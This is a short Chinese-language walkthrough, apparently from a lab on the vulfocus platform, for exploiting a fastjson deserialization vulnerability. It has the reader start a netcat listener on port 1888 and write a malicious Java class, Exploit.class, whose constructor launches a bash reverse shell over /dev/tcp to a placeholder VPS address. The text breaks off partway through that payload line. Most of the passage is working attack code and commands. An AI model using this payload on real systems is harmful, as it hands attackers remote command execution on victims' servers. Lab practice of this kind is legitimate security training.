1、登陆vulfocus,打开fastjson环境
2、服务器配置
2.1 打开端口代理
nc -lvvp 1888
2.2 挂载恶意Java程序
首先,编写恶意EXP,命名 Exploit.class,其中x.x.x.x为vps地址,1888为LADP监听端口
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/1888;cat <&5 | while read line; do $line 2>&5 >&5;